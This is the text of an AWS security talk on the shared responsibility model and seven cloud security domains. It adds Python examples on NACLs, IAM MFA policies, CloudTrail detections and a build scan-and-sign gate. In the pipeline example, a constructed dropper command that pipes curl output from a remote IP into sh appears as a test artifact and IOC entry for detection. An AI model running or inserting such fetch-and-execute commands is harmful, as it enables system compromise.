Jeff Westphal - Milwaukee and Madison AWS uGroup Leader
AWS Security 101: Understanding the Shared Security Model
@ClashofCoders
Diagram: two VPCs in USEast, PROD-VPC and DEV-VPC, each with a public subnet (instances behind an IGW) and a private subnet (instances); a security group in front of RDS; S3 buckets outside the VPCs.
Fundamental Concepts in AWS
Network
• VPC
• Public/Private Subnets
• Security Groups
• NACLs
• Availability Zones
Identity and Access
• IAM
• Users/Groups
• Permissions
• MFA
Data and Compute
• EC2
• EBS
• S3
• CloudTrail
• CloudWatch
Diagram also shows an ELB in Availability Zone USEast-1A.
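Security Groups and NACLs both appear on the list above, and the difference that bites in practice is state: a security group tracks connections, so reply traffic for an allowed inbound connection goes out even with no egress rule, while a NACL judges every packet on its own against numbered rules and needs an explicit outbound rule for the ephemeral port range. The simulator below is an added example, not code from the talk; the rules, addresses and packets are constructed.

```python
"""Security groups (stateful, allow-only) next to network ACLs (stateless, ordered,
allow or deny). Added example, not from the slides; rules and packets are constructed."""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str
    sport: int
    dport: int


def _rule_hits(cidr, proto, lo, hi, peer_ip, pkt_proto, port):
    return (ip_address(peer_ip) in ip_network(cidr)
            and proto in ("all", pkt_proto) and lo <= port <= hi)


@dataclass
class SecurityGroup:
    """Rules are (cidr, proto, from_port, to_port); there is no deny, only allow."""
    ingress: list
    egress: list
    flows: set = field(default_factory=set)   # connection-tracking state

    def inbound(self, pkt):
        ok = any(_rule_hits(*r, pkt.src, pkt.proto, pkt.dport) for r in self.ingress)
        if ok:
            self.flows.add((pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto))
        return ok

    def outbound(self, pkt):
        # A reply to a tracked inbound connection is allowed even with no egress rule at all.
        if (pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto) in self.flows:
            return True
        return any(_rule_hits(*r, pkt.dst, pkt.proto, pkt.dport) for r in self.egress)


class NetworkAcl:
    """Rules are (number, action, cidr, proto, from_port, to_port), evaluated lowest number
    first; the first match decides, and the implicit '*' rule denies everything else."""
    def __init__(self, inbound, outbound):
        self.inbound_rules = sorted(inbound)
        self.outbound_rules = sorted(outbound)

    @staticmethod
    def _decide(rules, peer_ip, pkt_proto, port):
        for _num, action, cidr, proto, lo, hi in rules:
            if _rule_hits(cidr, proto, lo, hi, peer_ip, pkt_proto, port):
                return action == "allow"
        return False

    def inbound(self, pkt):
        return self._decide(self.inbound_rules, pkt.src, pkt.proto, pkt.dport)

    def outbound(self, pkt):
        return self._decide(self.outbound_rules, pkt.dst, pkt.proto, pkt.dport)


def https_round_trip():
    """Same HTTPS request and reply through an SG with no egress rules and through two NACLs."""
    sg = SecurityGroup(ingress=[("0.0.0.0/0", "tcp", 443, 443)], egress=[])
    with_ephemeral = NetworkAcl(
        inbound=[(100, "allow", "0.0.0.0/0", "tcp", 443, 443)],
        outbound=[(100, "allow", "0.0.0.0/0", "tcp", 1024, 65535)])  # reply goes to a client ephemeral port
    without_ephemeral = NetworkAcl(
        inbound=[(100, "allow", "0.0.0.0/0", "tcp", 443, 443)],
        outbound=[(100, "allow", "0.0.0.0/0", "tcp", 443, 443)])     # common mistake: mirrors the inbound rule
    req = Packet(src="203.0.113.5", dst="10.0.1.10", proto="tcp", sport=51515, dport=443)
    rep = Packet(src="10.0.1.10", dst="203.0.113.5", proto="tcp", sport=443, dport=51515)
    return {
        "sg": (sg.inbound(req), sg.outbound(rep)),
        "nacl_with_ephemeral": (with_ephemeral.inbound(req), with_ephemeral.outbound(rep)),
        "nacl_without_ephemeral": (without_ephemeral.inbound(req), without_ephemeral.outbound(rep)),
    }


def nacl_order_matters():
    """A deny at a lower rule number beats a broader allow at a higher one, whatever order they were written in."""
    acl = NetworkAcl(
        inbound=[(100, "allow", "0.0.0.0/0", "tcp", 22, 22),
                 (90, "deny", "198.51.100.0/24", "tcp", 22, 22)],
        outbound=[])
    blocked = Packet(src="198.51.100.7", dst="10.0.1.10", proto="tcp", sport=40000, dport=22)
    allowed = Packet(src="203.0.113.5", dst="10.0.1.10", proto="tcp", sport=40000, dport=22)
    return acl.inbound(blocked), acl.inbound(allowed)


if __name__ == "__main__":
    print(https_round_trip())
    print(nacl_order_matters())
```

The "without_ephemeral" NACL is the one people write by mirroring the inbound rule: the request gets in, the reply never gets out, and the symptom looks like a hung TLS handshake rather than a firewall block.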
Diagram: Route 53, Shield (DDoS protection) and WAF (image captioned "Al Gore").
Demand Increases
Clash of Coders
Diagram: IAM Account A in AWS Region A holds VPC-A and VPC-B (each with a public subnet of instances behind an IGW and a private subnet of instances) and a Services VPC with a private subnet of instances, RDS behind a security group, an Elastic IP, Autoscaling, a VPC NAT Gateway and an ELB, all in one Availability Zone; VPC-A and VPC-B are joined by VPC peering. IAM Account B holds a VPC-B in AWS Region B and another in AWS Region C (same public/private layout), reached over a VPC peer and a VPN Gateway; S3 buckets sit outside the VPCs.
What’s Missing?
AWS and you share responsibility for security

AWS takes care of the security OF the Cloud:
• AWS Global Infrastructure: Regions, Availability Zones, Edge Locations
• AWS Foundation Services: Compute, Storage, Database, Networking

You get to define your controls ON the Cloud:
• Customer applications, Operating Systems & content
• Identity & Access Control
• Network Security
• Inventory & Config
• Data Encryption
Copyright 2018 Trend Micro Inc.
Why do I need additional security in the cloud?
Threats:
• Network attack
• Vulnerabilities
• Malware
• Insider threats
Compliance:
• PCI DSS
• HIPAA
• NIST
• Internal
Security at Scale
Diagram: Route 53, Shield and WAF (image captioned "Al Gore").
The 7 Security Domains of the Cloud Security Model
1. Network
2. Identity & Access Mgmt
3. Data
4. Visibility
5. Governance, Risk & Compliance
6. Threat & Vulnerability Protection
7. Application Security
Security Domain 1 – Network Security
Native Services
• VPC
• NACLs, Security Groups
• VPN, Direct Connect
• VPC Peering
• Public/Private Subnets
• ELB/ALB
Third-Party Services:
• Next-Gen Firewall
• CASB
• Software Defined Perimeter
Security Domain 2 – Identity and Access Management
Native Services
• IAM
• MFA
• SAML
• STS
• Directory Services
• AWS Organizations
Third-Party Services:
• LDAP
• SAML
• SSO
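MFA on the list above only does work when a policy enforces it, and the usual way is an explicit Deny conditioned on aws:MultiFactorAuthPresent. The evaluator below is an added example, not AWS's own policy engine: it models only Action/Resource wildcards and the Bool and BoolIfExists operators, enough to show why the choice of operator matters for requests signed with long-term access keys (where the MFA key is absent from the request context). The two policies, their names and the request contexts are constructed.

```python
"""Simplified IAM policy evaluation: an applicable explicit Deny wins, otherwise any
applicable Allow grants, otherwise the request is implicitly denied. Added example, not
AWS's evaluator; policies and request contexts are constructed."""
import fnmatch


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _matches(patterns, value):
    return any(fnmatch.fnmatchcase(value, p) for p in _as_list(patterns))


def _conditions_hold(stmt, ctx):
    for operator, pairs in stmt.get("Condition", {}).items():
        for key, wanted in pairs.items():
            actual = ctx.get(key)
            if operator == "Bool":
                # key missing -> condition is false -> the statement does not apply
                if actual is None or str(actual).lower() != str(wanted).lower():
                    return False
            elif operator == "BoolIfExists":
                # key missing -> condition is true; key present -> it must match
                if actual is not None and str(actual).lower() != str(wanted).lower():
                    return False
            else:
                raise ValueError("operator not modelled: " + operator)
    return True


def evaluate(policies, action, resource, ctx):
    decision = "implicit_deny"
    for policy in policies:
        for stmt in policy["Statement"]:
            applies = (_matches(stmt["Action"], action)
                       and _matches(stmt.get("Resource", "*"), resource)
                       and _conditions_hold(stmt, ctx))
            if not applies:
                continue
            if stmt["Effect"] == "Deny":
                return "explicit_deny"      # nothing overrides an applicable Deny
            decision = "allow"
    return decision


# Constructed policies: the first is the usual "deny anything without MFA" pattern,
# the second is the same statement written with Bool instead of BoolIfExists.
STRONG_MFA_GUARD = {"Statement": [
    {"Effect": "Allow", "Action": "ec2:*", "Resource": "*"},
    {"Effect": "Deny", "Action": "*", "Resource": "*",
     "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}}},
]}
WEAK_MFA_GUARD = {"Statement": [
    {"Effect": "Allow", "Action": "ec2:*", "Resource": "*"},
    {"Effect": "Deny", "Action": "*", "Resource": "*",
     "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "false"}}},
]}

MFA_SESSION = {"aws:MultiFactorAuthPresent": "true"}
NO_MFA_SESSION = {"aws:MultiFactorAuthPresent": "false"}
LONG_TERM_KEYS = {}   # the MFA key is absent from requests signed with long-term access keys


def compare_guards(action="ec2:StopInstances", resource="*"):
    """Decision for each guard under an MFA session, a session without MFA, and long-term keys."""
    return {
        name: tuple(evaluate([pol], action, resource, ctx)
                    for ctx in (MFA_SESSION, NO_MFA_SESSION, LONG_TERM_KEYS))
        for name, pol in (("strong", STRONG_MFA_GUARD), ("weak", WEAK_MFA_GUARD))
    }


if __name__ == "__main__":
    print(compare_guards())
```

The weak guard lets a stolen long-term access key through untouched, because a Bool condition on a key that is not in the request context is simply false and the Deny never applies; BoolIfExists is what makes the Deny cover that case.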
Security Domain 3 – Data
Native Services
• Encryption: KMS
• CloudHSM
• Macie
• GuardDuty
Third-Party Services:
• DLP
• Integrity Monitoring
• Log Inspection
Security Domain 4 – Visibility
Native Services
• CloudTrail
• CloudWatch
• SNS
• Trusted Advisor
Third-Party Services:
• SIEM
• Log Intelligence
• Perimeter Assessments
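CloudTrail is only visibility if something reads it; the SIEM and "log intelligence" items on the third-party side are where that happens. The following added example (not code from the talk) runs a few detection rules over a constructed log that uses CloudTrail's record layout: a console login without MFA, a security group opened to 0.0.0.0/0 on an admin port, root activity, trail tampering, and a burst of AccessDenied responses from one principal. The account id, principals, addresses and trail name are made up.

```python
"""Detection rules over CloudTrail records. Added example; SAMPLE_LOG is constructed to
look like a CloudTrail log file (same field names) and does not come from a real account."""
import json
from collections import Counter

ACCOUNT = "123456789012"   # constructed account id
SAMPLE_LOG = json.dumps({"Records": [
    {"eventTime": "2018-05-01T12:00:01Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::%s:user/alice" % ACCOUNT},
     "additionalEventData": {"MFAUsed": "No"}, "responseElements": {"ConsoleLogin": "Success"}},
    {"eventTime": "2018-05-01T12:05:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "AuthorizeSecurityGroupIngress", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::%s:user/alice" % ACCOUNT},
     "requestParameters": {"groupId": "sg-0123456789abcdef0", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
          "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventTime": "2018-05-01T12:06:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "Root", "arn": "arn:aws:iam::%s:root" % ACCOUNT},
     "requestParameters": {"name": "management-trail"}},
] + [
    {"eventTime": "2018-05-01T12:%02d:00Z" % (10 + i), "eventSource": "s3.amazonaws.com",
     "eventName": name, "sourceIPAddress": "198.51.100.7", "errorCode": "AccessDenied",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::%s:user/bob" % ACCOUNT}}
    for i, name in enumerate(["ListBuckets", "GetBucketAcl", "GetBucketPolicy"])
]})

ADMIN_PORTS = {22, 3389}
TRAIL_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}


def principal(ev):
    return ev.get("userIdentity", {}).get("arn", "unknown")


def rule_root_activity(ev):
    if ev.get("userIdentity", {}).get("type") == "Root":
        return "root account used for %s" % ev["eventName"]


def rule_console_login_without_mfa(ev):
    if (ev["eventName"] == "ConsoleLogin"
            and ev.get("responseElements", {}).get("ConsoleLogin") == "Success"
            and ev.get("additionalEventData", {}).get("MFAUsed") == "No"):
        return "console login without MFA from %s" % ev["sourceIPAddress"]


def rule_world_open_admin_port(ev):
    if ev["eventName"] != "AuthorizeSecurityGroupIngress":
        return None
    params = ev.get("requestParameters", {})
    for perm in params.get("ipPermissions", {}).get("items", []):
        cidrs = [r.get("cidrIp") for r in perm.get("ipRanges", {}).get("items", [])]
        lo, hi = perm.get("fromPort", 0), perm.get("toPort", 65535)
        if "0.0.0.0/0" in cidrs and any(lo <= p <= hi for p in ADMIN_PORTS):
            return "%s opened %s-%s to 0.0.0.0/0" % (params.get("groupId"), lo, hi)


def rule_trail_tampering(ev):
    if ev.get("eventSource") == "cloudtrail.amazonaws.com" and ev["eventName"] in TRAIL_TAMPER:
        return "CloudTrail %s on %s" % (ev["eventName"], ev.get("requestParameters", {}).get("name"))


PER_EVENT_RULES = [rule_root_activity, rule_console_login_without_mfa,
                   rule_world_open_admin_port, rule_trail_tampering]


def run_detections(log_text, access_denied_threshold=3):
    """Return (rule, eventTime, principal, message) tuples for every rule that fires."""
    records = json.loads(log_text)["Records"]
    findings = []
    for ev in records:
        for rule in PER_EVENT_RULES:
            msg = rule(ev)
            if msg:
                findings.append((rule.__name__, ev["eventTime"], principal(ev), msg))
    # aggregate rule: repeated AccessDenied from one principal looks like permission probing
    denied = Counter(principal(ev) for ev in records if ev.get("errorCode") == "AccessDenied")
    for who, n in denied.items():
        if n >= access_denied_threshold:
            findings.append(("rule_access_denied_spike", records[-1]["eventTime"], who,
                             "%d AccessDenied responses" % n))
    return findings


if __name__ == "__main__":
    for f in run_detections(SAMPLE_LOG):
        print(*f, sep=" | ")
```

The StopLogging record fires two rules at once (root use and trail tampering), which is the right outcome: the attacker's first move after getting root is to blind the trail, and you want that to page someone. The AccessDenied threshold is deliberately a parameter; tune it against your own baseline before wiring it to an alarm.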
Security Domain 5 – Governance & Compliance
Native Services
• CloudTrail
• CloudWatch
• Config
• AWS Quick Starts
Third-Party Services:
• Best-Practice Checks
• Charge Monitoring
• Customized Alerts
Security Domain 6 – Threat and Incident Detection and Response
Native Services
• VPC
• Security Groups, NACLs
• WAF
• Shield
• Inspector
Third-Party Services:
• Intrusion Prevention
• Deep Packet Inspection
• Malware, Antivirus
• Zero Day/Hour Protection
• Case Management
Security Domain 7 – Application Security
Native Services
• Inspector
• WAF
• API Gateway
• Cognito
Third-Party Services:
• CVE Checks
• Host-Based Security Controls
• Application Control
• Vulnerability Scanning
Serverless and Event Driven Architectures
Diagram (Clash of Coders): Mobile Users, CloudFront, Internet Gateway, ALB, Lambda Functions, DynamoDB, ElastiCache Cluster, Kinesis Streams, SNS Mobile Notifications, Game Updates, S3 Bucket (Static Content); build side: Developer, CodeCommit, CodeBuild, ECR, Lambda Functions.
Integrated Protection through the entire Application Lifecycle
Pipeline: Commit → Build → Scan → Alert → Sign/Promote → Push → Deploy
Examine (via APIs):
• Malware
• Vulnerabilities
• Custom IOCs
Builds that pass are signed and promoted.
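The Scan, Sign/Promote and Deploy steps above can be written down as a gate: the scanner refuses to sign anything with a finding, and the deploy step refuses anything whose signature does not verify against what it is about to run. The code below is an added example, not Trend Micro's product or the talk's code. The artifact contents, the custom-IOC hash list and the signing key are constructed, and HMAC stands in for the asymmetric signature a real pipeline would use with a key held in KMS or CloudHSM.

```python
"""Build-to-deploy gate: scan for known-bad hashes, sign the digest only on a clean scan,
verify before deploy. Added example; artifact, IOC list and key are constructed, and HMAC
stands in for an asymmetric signing scheme."""
import hashlib
import hmac

SIGNING_KEY = b"constructed-ci-signing-key"   # real pipelines keep this in KMS/CloudHSM, not in source
KNOWN_BAD_SHA256 = {  # constructed "custom IOC": hash of a dropper script
    hashlib.sha256(b"#!/bin/sh\ncurl http://198.51.100.9/x | sh\n").hexdigest()}


def scan(artifact):
    """artifact is a dict of file name -> bytes (think: files in a container layer)."""
    return [("custom_ioc", name) for name, data in artifact.items()
            if hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256]


def digest(artifact):
    # Deterministic over sorted (name, sha256(content)) pairs, so dict order cannot change it.
    h = hashlib.sha256()
    for name in sorted(artifact):
        h.update(name.encode())
        h.update(b"\0")
        h.update(hashlib.sha256(artifact[name]).digest())
    return h.hexdigest()


def sign(artifact, key=SIGNING_KEY):
    """Scan / Sign stage: no attestation is issued for a build with findings."""
    findings = scan(artifact)
    if findings:
        return None, findings
    d = digest(artifact)
    return {"digest": d, "sig": hmac.new(key, d.encode(), "sha256").hexdigest()}, []


def verify(artifact, attestation, key=SIGNING_KEY):
    """Deploy stage: what is about to run must hash to the attested digest, and the
    signature over that digest must check out. Either failure blocks the deploy."""
    if not attestation or digest(artifact) != attestation["digest"]:
        return False
    expected = hmac.new(key, attestation["digest"].encode(), "sha256").hexdigest()
    return hmac.compare_digest(expected, attestation["sig"])


def demo():
    clean = {"app.py": b"print('hello')\n", "Dockerfile": b"FROM python:3\n"}
    attestation, findings = sign(clean)
    tampered = {**clean, "app.py": b"import os; os.system('id')\n"}          # changed after signing
    infected = {**clean, "run.sh": b"#!/bin/sh\ncurl http://198.51.100.9/x | sh\n"}  # IOC hit
    return {
        "clean_signed": attestation is not None and not findings,
        "clean_verifies": verify(clean, attestation),
        "tampered_verifies": verify(tampered, attestation),
        "infected_signed": sign(infected)[0] is not None,
        "infected_findings": sign(infected)[1],
        "wrong_key_verifies": verify(clean, sign(clean, key=b"someone-elses-key")[0]),
    }


if __name__ == "__main__":
    print(demo())
```

Two design points carry over to real pipelines regardless of the signing scheme: the digest is computed over the artifact contents, not over a tag or a file name that can be re-pointed, and the deploy step recomputes it rather than trusting the value in the attestation.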
7 Security Domains

OSI Model (mnemonic: Please Do Not Throw Sausage Pizza Away)
• Physical
• Data Link
• Network
• Transport
• Session
• Presentation
• Application

Cloud Security Model (mnemonic: ? ? ? ? ? ? ?)
• Network
• Identity & Access Mgmt
• Data
• Visibility
• Governance, Risk & Compliance
• Threat, Vulnerability Protection
• Application Security

@mkeaws
Thank you!!! Hope to see everyone at Happy Hour!
